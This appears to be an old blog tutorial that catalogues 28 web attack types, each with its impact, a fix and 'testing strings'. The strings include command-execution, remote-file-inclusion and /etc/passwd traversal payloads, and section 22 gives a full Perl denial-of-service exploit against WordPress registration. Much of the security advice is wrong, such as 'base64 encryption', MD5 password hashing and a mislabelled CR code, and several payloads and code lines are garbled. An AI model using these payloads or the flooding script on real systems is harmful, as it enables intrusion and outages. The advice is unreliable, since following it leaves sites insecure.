Most of Web Attacks

I will be explaining most of web attacks here,just pay attention.


1.)SQL injection

a)Description

SQL injection allows an attacker to execute sql commands on the server that he is attacking

b)Impact

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

c)Recommendation

Allow only a-zA-Z0-9 characters


d)Testing string/s

('), (/), (\), (#), (") (--), (-), (*)

e)Response

200 OK, database error messages, redirection to another page



2.)Cross Site Scripting (XSS)

a)Description

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user.
Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
It's XSS because CSS means "Cascading Style Sheets"

b)Impact

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.

c)Recommendation

Allow only a-zA-Z0-9 characters or use the function htmlspecialchars(); for php


d)Testing string/s

(), ([script]alert();[/script]), (), ()

e)Response

200 OK, a poup-up message with your cookies



3.)Cross site request forgery (CSRF)

a)Description

Cross-Site Request Forgeries (CSRF) are an almost opposite style of attack. Rather than exploiting the trust that a user has for a Web site, they exploit the trust that a Web site has for a user. In the case of the XSS attacks we just discussed, the user is the victim. In the case of CSRF, the user is an unknowing accomplice.

b)Impact

An attacker may put a link on a forum and when someone clicks the link he will send a message to the server forum.This may couse a flood

c)Recommendation

-Use POST instead of GET method
-Request authorization
-Check the Referer
-Every request has to be unique

d)Testing string/s




Subject:


Message:






This way the attacker will flood the server and he could bypass firewall protection seanse the flooders would be people that don't know what they are doing

e) Response

200 OK, successful redirection



4.)PHP injection

a)Description

PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control
all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.

b)Impact

Malicious users may inject PHP code which will be executed on the server side. It's possible to run system commands if the PHP interpreter allows system() or similar functions.

c)Recommendation

Allow only a-zA-Z0-9 characters and set php.ini as it follows:

engine = off
register_globals = off
magic_quotes_gpc = off
magic_quotes_runtime = Off
magic_quotes_sybase = Off
session.use_trans_sid = off
session.use_only_cookies = 1
safe_mode = on
safe_mode_gid = Off
safe_mode_include_dir = Off
safe_mode_exec_dir = Off
allow_url_fopen = off
open_basedir = '/home/sheib/public_html/unsafe' //edit this
file_uploads = off
display_errors = off
log_errors = on
expose_php = off
error_reporing = E_ALL
session.save_path ="/tmp" //edit this if you want
post_max_size = 8M
disable_functions = exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec, fsockopen, pfsockopen, socket_bind, socket_accept, socket_listen, socket_create, stream_socket_client, stream_socket_server, dl, glob, posix, include, include_once, require and require_once, fopen, readfile, file, imagecreatefromXXX, phpinfo, eval, chroot, suexec, Limits

*addslashes/stripslashes/magic_quotes_gpc won't help much
*when sending data use $_GET/$_POST and for authentication $_SESSION instead of register_globals
*Don't count on encryption functions like urlencode or base64_encode use md5 hashing


d)Testing string/s

(), (system(base64_decode(YWRtaW4=) #admin), ('.passthru($_GET[cmd]).'&cmd=id), (phpinfo()

e)Responce

200 OK, test, admin, uid...



5.)PERL injection

a)Description

Like php injection, perl injection would be the same but the differences is that you inject perl code not php

b)Impact

Malicious users may inject perl code which will be executed on the server side.

c)Recommendation

Allow only a-zA-Z0-9 characters and use no warnings;

d)Testing string/s

(perl -e system(ipconfig)), (perl -e exec(ipconfig)), (perl -e \'print 'foo'\)

e)Responce

200 OK, Windows IP Configuration, foo



6.)Path disclosure

a)Description

Contains an error message that discloses the installation path and other data.

b)Impact

A remote user can determine the full path to the web root directory and other potentially sensitive information.

c)Recommendation

Allow only a-zA-Z0-9 characters and turn off error messages depending on the script

d)References

http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm

e)Testing string/s

(/), (\)

f)Responce

200 OK, Warning message



7.)ASP injection

a)Description

Like php or perl injection, asp injection would be the same but the differences is that you inject asp code not php/perl

*Note*
ASP injection is possbile only on windows machines running IIS

b)Impact

Malicious users may inject asp code which will be executed on the server side.

c)Recommendation

Allow only a-zA-Z0-9 characters and dissable the following functions:

sp_makewebtask
xp_startmail
xp_sendmail
xp_cmdshell
xp_regwrite

d)Testing string/s

(<%@ LANGUAGE = 'JScript' %> <% Response.Write('Test'); %>;)

f)Responce

200 OK, Test



8.)Source code disclosure

a)Description

It is possible to read the source code of a script by using script filename as a parameter. It seems that the script includes a file which name is determined using user-supplied data. This data is not properly validated before being passed to the include function.

b)Impact

An attacker can gather sensitive information (database connection strings, application logic) by analysing the source code. This information can be used to launch further attacks.

c)Recommendation

Analyse the source code of this script and solve the problem.

d)References

http://www.imperva.com/application_defense...disclosure.html -> "Source Code Disclosure" by Impreva

e)Testing string/s

request the file itself

f)Responce

200 OK,



8.Server side includes (SSI)

a)Description

Server Side Includes or SSI is an easy server-side scripting language used almost exclusively for the web. As its name implies, its primary use is including the contents of a file into another, via a Web Server.

SSI is primarily used to "paste" the contents of one or more files into another. For example, a file (of any type, .htm, .txt, etc.) containing a daily quote, could be included into multiple SSI Enabled pages throughout a website, by placing the following code into the desired pages. With one change of the quote.txt file, pages including the snippet will display the latest daily quote. Server Side Includes are useful for including a common piece of code throughout a site, such as a navigation menu.

In order for a web server to recognise a SSI-enabled HTML file and therefore carry out these instructions, the file must end with the .shtml extension. SSI files can also end with .shtm but this depends on the servers ability to recognise the extension.

b)Impact

An attacker can execute commands on the server

c)Recommendation

turn off SSI

d)References

http://en.wikipedia.org/wiki/Server_Side_Includes -> "Server Side Includes" by Wikipedia

e)Testing string/s




f)Responce

200 OK, root, uid....



9.)Code execution

a)Description

Code execution vulnerabilities occur where the output or content served from a Web application can be manipulated in such a way that it triggers server-side code execution. In some poorly written Web applications that allow users to modify server-side files (such as by posting to a message board or guestbook) it is sometimes possible to inject code in the scripting language of the application itself.

b)Impact

A malicious user may execute arbitrary system commands with the permissions of the web server.

c)Recommendation

*Allow only a-zA-Z0-9 characters
*Turn on safe_mode
*Dissable exec, passthru, proc_open, shell_exec, system, popen, pcntl_fork, pcntl_exec
*Set permitions so that only root can execute commands
*Use escapeshellcmd or escapeshellarg

d)References

http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp

e)Testing string/s

(|id|), ($(id)), (; id), (| id), (&& id) (|| id), (> id), (<>

f)Responce

200 OK, uid...



10.File inclusion

a)Description

An attacker could include a remote or local file and execute commands on the server

b)Impact

It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.

c)Recommendation

*allow_url_fopen = off
*use file_exists(); function to validate if the file is valid
*disable user control


d)References

http://www.php.net/manual/en/features.remote-files.php -> "Using remote files"
http://www.theserverpages.com/10101/21/ -> "Code Injection Vulnerabilities Explained" by The Server Pages
http://www.owasp.org/index.php/PHP_Top_5 -> "PHP Top 5" by Owasp

e)Testing string/s

(http://site.domain/include/test.php), (/file.php)

Where test.php contains:


$t=system('id');
echo "$t";
?>

f)Responce

200 OK, uid....


11.)Directory Traversal

a)Description

Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

b)Impact

By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.

c)Recommendation

*Allow only a-zA-Z0-9 characters only
*Set open_basedir
*Set display_errors to off

d)References

http://www.acunetix.com/websitesecurity/di...y-traversal.htm -> "Directory Traversal Attacks" by Acunetix
http://bg.php.net/features.safe-mode -> "Security and Safe Mode"
http://www.securityfocus.com/infocus/1709 -> "Penetration Testing for Web Applications (Part Two)" by Jody Melbourne and David Jorm
http://en.wikipedia.org/wiki/Directory_traversal -> "Directory traversal" by Wikipedia
http://www.imperva.com/application_defense..._traversal.html -> "Directory Traversal" by Imperva
http://cert.uni-stuttgart.de/archive/vulnw...2/msg00007.html -> "phpBB Attachment Mod Directory Traversal HTTP POST Injection" by Paul Laudanski

e)Testing string/s

(../) (../../../../../../../../etc/passwd)

f)Responce

200 OK, directory listening, root



12.)Cross Frame scripting (XFS)

a)Description

This is an attack technique used to trick a user into thinking that fake web site content is legitimate data.

b)Impact

Malicious users may poison a frame allowing them to conduct phishing attacks.

c)Recommendation

Allow only a-zA-Z0-9 characters and verfy the data send by the user

d)References

http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf -> "The Phishing Guide" by Gunter Ollmann

e)Testing string/s

http://your-page.com/grab_data.php

f)Responce

200 OK, http://your-page.com/grab_data.php



13.)CGI security checks

a)Description

CGI security checks are used to see if the Common Gateway Interface of a site is vulnerable to old/new bugs

b)Impact

Malicious users may execute commands or do something else depending on the bug

c)Recommendation

Keep updated your server and software

d)References

http://www.w3.org/Security/faq/wwwsf4.html -> "CGI script security" by Lincoln D. Stein and John N. Stewart
http://www.mirrors.wiretapped.net/security...ng/safe-cgi.txt -> "Safe CGI Programming" by Paul Phillips
http://bau2.uibk.ac.at/matic/cgi2.htm -> "CGI security holes" by Jennifer Myers

e)Testing string/s

/.%252e/.%252e/.%252e/winnt/repair/sam._
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._

f)Response

200 OK



14.)Cookie attacks

a)Description

By injecting a custom HTTP header or by injecting a META tag is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.

b)Impact

By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

c)Recommendation

You need to filter the output in order to prevent the injection of custom HTTP headers or META tags.
Additionaly, with each login the application should provide a new session ID to the user.

d)References

http://www.acros.si/papers/session_fixation.pdf -> "Session Fixation Vulnerability In Web-based Applications" by Mitja Kolsek
http://www.webappsec.org/projects/threat/c..._fixation.shtml -> "Session Fixation" by Web Application Security Consortium
http://www.php.net/session -> "Session Handling Functions"
http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf -> "Hacking Web Applications Using Cookie Poisoning" by Amit Klein
http://www.securityfocus.com/infocus/1722 -> "Penetration Testing for Web Applications (Part Three)" by Jody Melbourne and David Jorm

e)Testing string/s

(Set-Cookie: cookiename=cookievalue) ()

f)Response

200 OK, new cookie that contains your data



15.)Http response splitting/CRLF injection

a)Description

HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If the user input is injected into the value section without properly escaping/removing CRLF characters it is possible to alter the HTTP headers structure.
HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response.

b)Impact

Is it possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies, spoof mail headers or execute HTML code. This may conduct to vulnerabilities like XSS (cross-site scripting) or session fixation.

c)Recommendation

You need to restrict CR(0x13)(\r) and LF(0x10)(\n) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.

d)References

http://www.acunetix.com/websitesecurity/crlf-injection.htm -> "CRLF Injection Attack" by Acunetix
http://www.cgisecurity.com/lib/crlf-injection.txt -> "CRLF Injection" by Ulf Harnhammar
http://packetstormsecurity.org/papers/gene...ttpresponse.pdf -> "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html -> "Introduction to HTTP Response Splitting" by dcrab
http://www.cgisecurity.com/papers/header-b...xploitation.txt -> "Header Based Exploitation: Web Statistical Software Threats" by Cgisecurity
http://www.cgisecurity.com/lib/bill/Willia...llamy_GCIH.html -> "TCP Port 80 - HyperText Transfer Protocol (HTTP) Header Exploitation" by William Bellamy Jr.

e)Testing string/s

http://localhost/mail.php?from=foo@foo.com...;message=moofoo

Where our headers will look like:

CC: foo@foo.com
Bcc: foo@foo.com

And if we change our url to

http://localhost/mail.php?from=foo@foo.com&to=mail1, mail2, mail3\r\n&subject=foo&message=moofoo

And we just did a mail spoofing attack

f)Responce

200 OK, changed headers, redirection to another page



16.)Buffer overflow

a)Description

It is almost impossible to find today a buffer overflow in a web application but still there are some scripts that use C\C++\C# code in them

b)Impact

An attacker could execute commands on the server and even get root privileges

c)Recommendation

Analyse the source code of your C\C++\C# program and fix all possible overflows

*For Microsoft Visual C++ .NET you can use /GS (Buffer Security Check) when compiling to see if there are any possible overflows and /Gs (Control Stack Checking Calls) but be careful when using /Gs

d)References

http://www.whitehatsec.com/articles/mythbu...er_overflow.pdf -> "Myth-Busting Web Application Buffer Overflows" by Jeremiah Grossman
http://en.wikipedia.org/wiki/Buffer_overflow -> "Buffer overflow" by Wikipedia

e)Testing string/s

http://webserver/foo.cgi?param1=AAAAAAAAAAAAAAAAA... 5000 A's

f)Responce

500 International Server Errors, 0x41414141 or something simular



17.)Format String

a)Description

Format string attacks are a new class of vulnerabilities discovered around 1999, previously thought harmless. Format string attacks can be used to crash a program or to execute harmful code. The problem stems from the use of unfiltered user input as the format string parameter in certain C functions that perform formatting, such as printf()

b)Impact

A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of bytes formatted to the same argument to printf(), assuming that the corresponding argument exists, and is of type int * .

c)Recommendation

Analyse the source code of your C\C++\C# program and fix all possible overflows

d)References

http://www.webappsec.org/projects/threat/c...ng_attack.shtml -> "Format String Attack" by Web Application Security Consortium
http://en.wikipedia.org/wiki/Format_string_attack -> "Format string attack" by Wikipedia

e)Testing string/s

(%f), (%p), (%n)

http://server/foo.cgi?param1=AAAA%x%x%x%x%x%x%x%x

f)Responce

Error message, something like 0x0804960c and so on...



18.)Integer Overflow

a)Description

In computer programming, an integer overflow is an anomalous condition which may cause a buffer overflow, resulting in a computer security risk where adjacent, valid program control data may be overwritten, permitting the execution of arbitrary, and potentially harmful code.

b)Impact

A malicious user may create a buffer overflow condition and execute commands on the server

c)Recommendation

Analyse the source code of your C\C++\C# program and fix all possible overflows

d)References

http://www.phrack.org/phrack/60/p60-0x0a.txt -> "Basic Integer Overflows" by blexim
http://en.wikipedia.org/wiki/Integer_overflow -> "Integer overflow" by Wikipedia

e)Testing string/s

http://server/foo.cgi?param1=35 65535

f)Responce

Error message, something like 0x0000ffff and so on...



19.)LDAP Injection

a)Description

Lightweight Directory Access Protocol (LDAP) is an open-standard protocol for both querying and manipulating X.500 directory services. When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of an LDAP statement.

b)Impact

When an attacker is able to modify an LDAP statement, the process will run with the same permissions as the component that executed the command. (e.g. Database server, Web application server, Web server, etc.). This can cause serious security problems where the permissions grant the rights to query, modify or remove anything inside the LDAP tree.

c)Recommendation

Allow only a-zA-Z0-9 characters

d)References

http://en.wikipedia.org/wiki/LDAP -> "Lightweight Directory Access Protocol" by Wikipedia
http://www.webappsec.org/projects/threat/c...injection.shtml -> "LDAP Injection" by Web Application Security Consortium
http://www.spidynamics.com/whitepapers/LDAPinjection.pdf -> "LDAP Injection" by Sacha Faust
http://www.ietf.org/rfc/rfc1960.txt -> "A String Representation of LDAP Search Filters" by Tim Howes
http://ldapman.org/ -> LDAP resources

e)Testing string/s

()), (*)

f)Responce

Redirection, error message containing information



20.)XPath Injection

a)Description

This script is possibly vulnerable to XPath Injection attacks.XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

b)Impact

An unauthenticated attacker may extract a complete XML document using XPath querying. This may compromise the integrity of your database and expose sensitive information.

c)Recommendation

Allow only a-zA-Z0-9 characters

d)References

http://palisade.paladion.net/issues/2005Jul/xpath-injection/ -> "XPath injection in XML databases" by Runa Dwibedi
http://www.webappsec.org/projects/threat/c...injection.shtml -> "XPath Injection" by Web Application Security Consortium
http://www.w3.org/TR/xpath -> "XML Path Language (XPath)" by W3C
http://arxiv.org/PS_cache/cs/pdf/0210/0210026.pdf -> "Encoding a Taxonomy of Web Attacks with Different-Lenght Vectors" by Gonzalo Alvarez and Slobodan Petrovic
http://packetstormsecurity.org/papers/bypa...on_20040518.pdf "Blind Xpath Injection" by Amit Klein

e)Testing string/s

('), (/), (\), (#), (") (--), (-), (*)

f)Responce

Full content of XML document



21.)URL redirection

a)Description

This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting.

b)Impact

A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.

c)Recommendation

Your script should properly sanitize user input.

d)References

http://www.nist.org/news.php?extend.147 -> "Google can be Exploited to Assist Phishing Attacks" by NIST IT SECURITY

e)Testing string/s

('), (/), (\), (#), (") (--), (-), (*)

f)Responce

200 OK, redirection to another page



22.Web Application DoS

a)Description

Web application DoS (Denial of Service) is an attack that sends mutlyple requests with a very large size to a server

b)Impact

Computer crash, service crash, SQL crash

c)Recommendation

Preventing web application dos and not only on web applications isn't that hard but protecting against DDOS (Distributed Denial Of Service) is impossible.Anyway here are some tips:

*Use POST instead of GET
*Make a function that will stop mutlyple POST/GET requests to your site from the same user.If the user makes a requests 3-4 times the stop his ip from requesting anything on your site for 5-10 minutes and log his ip
*POST requests should not be more longer then 8 MB
*When specifying a maxsize value be sure to make a check function so that the attacker can't make it longer then it is

d)References

http://en.wikipedia.org/wiki/Denial-of-service_attack -> "Denial-of-service attack" by Wikipedia
http://www.cert.org/tech_tips/denial_of_service.html -> "Denial of Service Attacks" by CERT
http://cnscenter.future.co.kr/resource/sec...DoS_attacks.pdf -> "Application Denial of Service (DOS) Attacks" by Stephen de Vries
http://www.lasr.cs.ucla.edu/ddos/404_mirkovic_j.pdf -> "Attacking DDoS at the Source" by Jelena Mirkovic, Gregory Prier and Peter Reiher

e)Testing string/s

Here is my wordpress crash exploit:

#!perl
#Greets ot all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev wink.gif
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed

use Socket;

if (@ARGV <>

$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999;>smile.gif
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";

my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}

#s33 if the server is down
print "\n\n";
system('ping $host');

sub usage {

print "\n\t(W)ordpress 2.0.1 ®emote (D)oS (E)xploit (cool.gify matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /woredpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};

#Wordpress answer:
#A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this. cool.gif Registration is off by default, so the severity of this sort of DOS is rather low.
#Well I like giving my own patches or security solutions when I find a bug but this time I agree with the wordpress developers

f)Responce

Server crash, service crash, almost impossible to move your mouse


23.)Hidden field manipulation

a)Description

Hidden fields are used for sending a unique value to the server that cannot be edited by the user.But if the user decides to see the html source hi will see the hidden field and he could change it

b)Impact

A remote attacker can change values to different products(if we are talking about a shop or something simular) or cause a server crash

c)Recommendation

Make a function that will not accept any other value then the one in the hiddien field

d)References

http://www.securityfocus.com/infocus/1704 -> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm

e)Testing string/s






The attacker sees this and saves the html on his hard drive.From then he just changes the value of 7.10 to let's say 2

f)Responce

200 OK, acception of the value from the server



24.)Authentication attacks

a)Description

Authentication plays a very important role in security.We use it to identify someone by a special value, cookie, session or something like that

b)Impact

If an attacker bruteforces or gets somehow the unique identification value of the person he want's then he could authenticate as him

c)Recommendation

*Use SSL on your sites
*When user logs his cookie or whatever it is has to be unique and used only once.That means that when he logouts the cookie has to be destroyd and the next time a new should be created
*Authentication keys should be long and encrypted.Use base64 encryption or md5 hashing
*It would be good to have a ip log function
*Authorization should be required to prevent spoofing/hijacking attacks

d)References

http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
http://www.iss.net/security_center/advice/...ing/default.htm -> "Spoofing papers" by Internet Security Systems
http://en.wikipedia.org/wiki/Spoofing_atta...ng_and_phishing -> "Spoofing attack" by Wikipedia
http://www.cs.princeton.edu/sip/WebSpoofing/ -> "Web Spoofing" by Department of Computer Science
http://en.wikipedia.org/wiki/Hijacking -> "Hijacking" by Wikipedia

e)Testing string/s

http://leet.com/login.php?id=4256467

And if there is a id 4256467 you will be logged

f)Responce

200 OK, succesful authentication



25.)Authorization attacks

a)Description

While authentication requires a unique value, authorization requests a username/password value

b)Impact

If an attacker has the username/password value he can log in as the user

c)Recommendation


*Passwords should be long and complex.Atleast 14 characters long and should contain atleast 5-6 special symbols from the keyboard
*Log ip's that make 6 unseccesful login tryes and bann them for 5-10 minutes
*Use md5 hashing
*Use SSL

d)References

http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix

e)Testing string/s







From then the attacker only tryes different username and password combinations to log in

f)Responce

200 OK, acception of the username and password from the server



26.)Web pilfering/crawling

a)Description

This attack is used to search a hole site or parts of it for password files, hidden fields and other sensitive information

b)Impact

An attacker could get a lot of information about a site and even passwords

c)Recommendation

*Don't hide sensitive data in html
*Check your logs for multyple GET requests

d)References

http://en.wikipedia.org/wiki/Web_crawler "Web crawler" by Wikipedia
http://en.wikipedia.org/wiki/Distributed_web_crawling "Distributed web crawling" by Wikipedia

e)Testing string/s

GET /the_html_document.htlm
.....

f)Responce

200 OK, hidden info



27.)Domain Hijacking

a)Description

This attack is used to take over domain names

b)Impact

An attacker could steal a domain name and from then he could use it for phishing scames

c)Recommendation

See the links below

d)References

http://ccpower.info/dhijacking.html#start -> "Domain Hijacking: A step-by-step guide" by CCpower
http://en.wikipedia.org/wiki/Domain_hijacking -> "Domain hijacking" by Wikipedia

e)Testing string/s

See http://ccpower.info/dhijacking.html#start

f)Responce

Changed domain settings


28.)Google

a)Description

Google attacks are based on found already attacks

b)Impact

It depends on the hole

c)Recommendation

Remove all pages identified by Google hacking queries

d)References

http://ihackgoogle.com -> Google Hacking Database (GHDB)
http://www.acunetix.com/websitesecurity/google-hacking.htm -> "Google hacking" by Acunetix

e)Testing string/s

inurl:passwd.txt site:yoursite.com

f)Responce

200 OK




Final words:

As you can see in almost all of the attacks the best solution is to allow only az-AZ0-9 characters.Well there are other type of protection methods too but they could be bypassed.As an example addslashes could be bypassed with %2527.If you are worring about how much time it will cost you to scan your site for all these attacks well then you could use some of the following scanners:

Acunetix(http://www.acunetix.com/)
MaxPatrol(http://www.maxpatrol.com/)
Nikto(http://www.cirt.net/code/nikto.shtml)
Nessus(http://www.nessus.org/)
WebInspect(http://www.spidynamics.com/products/webinspect/)
Shadow Security Scanner(http://www.safety-lab.com/en/products/1.htm)
GFI LANguard(http://www.gfi.com/lannetscan/)
Typhon(http://www.ngssoftware.com/products/internet-security/ngs-typhon.php)

Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org

0 comments:

Need to say something ? Spell it out :)